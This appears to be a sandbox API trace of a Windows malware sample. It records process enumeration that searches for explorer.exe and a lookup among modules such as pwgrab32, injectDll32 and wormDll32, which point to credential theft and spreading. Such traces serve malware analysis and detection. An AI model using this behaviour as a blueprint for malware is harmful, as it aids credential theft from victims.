	[0254.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0254.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0254.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x700
	[0254.736] Process32FirstW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0254.737] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0254.737] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0254.738] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0254.738] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0254.740] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0254.740] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.741] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0254.741] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0254.742] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0254.742] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.743] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0254.744] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0254.745] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0254.745] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0254.746] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0254.746] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0254.748] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0254.748] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0254.749] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0254.749] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.751] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.751] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.752] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.752] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.753] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.753] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.755] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.755] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.756] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.756] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.757] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.757] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.759] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.759] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0254.760] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0254.760] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.761] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.762] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0254.764] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0254.764] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.796] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0254.796] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.797] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.797] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.798] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0254.798] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0254.798] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0254.799] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0254.799] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0254.799] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0254.800] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0254.800] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0254.801] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0254.801] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0254.802] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0254.802] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0254.803] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0254.803] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0254.804] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0254.804] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0254.805] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0254.805] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0254.806] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0254.806] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0254.806] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0254.807] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0254.807] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0254.807] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0254.808] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0254.808] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0254.809] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0254.809] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0254.810] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0254.810] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0254.812] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0254.812] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0254.813] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0254.813] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0254.814] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0254.814] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0254.815] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0254.815] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0254.816] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0254.816] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.817] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0254.817] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.818] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0254.818] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.819] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0254.819] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0254.820] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0254.820] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.820] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.820] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.821] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.821] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.822] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.822] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.823] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.823] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.824] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0254.824] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.825] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.825] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.826] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.826] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.827] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0254.827] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.828] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0254.828] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.829] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0254.829] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.830] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0254.830] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.830] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0254.830] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.831] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0254.831] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.832] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0254.832] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0254.833] CloseHandle (hObject=0x700) returned 1
	[0254.836] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0254.836] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0254.836] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0254.836] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0254.836] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0254.836] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0254.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2f10) returned 1
	[0254.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807570) returned 1
	[0254.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0254.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0254.836] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0254.836] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0254.837] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0254.837] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0254.837] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0254.837] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0254.837] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0254.837] Sleep (dwMilliseconds=0x4e20) 
	[0254.842] Sleep (dwMilliseconds=0x4e20) 
	[0254.859] Sleep (dwMilliseconds=0x4e20) 
	[0254.874] Sleep (dwMilliseconds=0x4e20) 
	[0254.968] Sleep (dwMilliseconds=0x4e20) 
	[0255.014] Sleep (dwMilliseconds=0x4e20) 
	[0255.061] Sleep (dwMilliseconds=0x4e20) 
	[0255.077] Sleep (dwMilliseconds=0x4e20) 
	[0255.092] Sleep (dwMilliseconds=0x4e20) 
	[0255.109] Sleep (dwMilliseconds=0x4e20) 
	[0255.123] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7fad7940, dwHighDateTime=0x1d50a6a)) 
